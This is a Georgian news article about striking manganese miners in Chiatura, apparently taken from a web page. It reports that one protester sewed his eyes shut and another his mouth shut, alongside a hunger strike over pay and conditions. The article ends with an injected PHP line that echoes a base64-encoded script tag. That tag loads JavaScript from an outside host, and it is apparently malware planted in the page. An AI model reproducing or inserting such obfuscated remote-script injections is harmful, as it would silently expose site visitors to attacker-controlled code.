celsiusi
ავერსი შნაიდერი

ჭიათურაში მიმდინარე მაღაროელთა პროტესტის ერთ-ერთმა მონაწილემ თვალები ამოიკერა.

"ეს იყო ჩემი პირადი გადაწყვეტილება. მოშიმშილეებს ვისაც ვუთხარი, ლამის ყველა წინააღმდეგი იყო. მინდა, ამით ყველას დავანახო, რომ ერთმანეთის გვერდით ძლიერები ვართ. მე არ მინდა დავინახო „ჯორჯიან მანგანეზი“, არ მინდა დავინახო ეს ხალხი, სანამ ჩვენი საქმე არ მოგვარდება. როცა მოგვარდება, ერთად დავინახავთ ყველა“, – განაცხადა მაღაროელმა საპროტესტო აქციაზე გამოსვლისას. მის ვიდეოს ფეისბუკგვერდი "მაღაროელი" ავრცელებს.
 

შეგახსენებთ, რომ ჭიათურაში მაღაროელების პროტესტი უკვე ერთი კვირაა გრძელდება. გაფიცული მაღაროელები მე-6 დღეა შიმშილობენ.

ისინი მუნიციპალიტეტის მერიასთან რჩებიან და პერიოდულად ქალაქში მსვლელობას მართავენ. გუშინ ერთმა მაღაროელმა პროტესტის ნიშნად პირი ამოიკერა.

დასაქმებულები კომპანიის მიერ შეთავაზებულ პირობებს აპროტესტებენ და მუშაობის გაგრძელებას არ აპირებენ.

მათი თქმით, აქციები შეწყდება და მუშაობა განახლდება იმ შემთხვევაში, თუ დასაქმებულების ხელფასები გაიზრდება და პირობები გაუმჯობესდება.
383
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");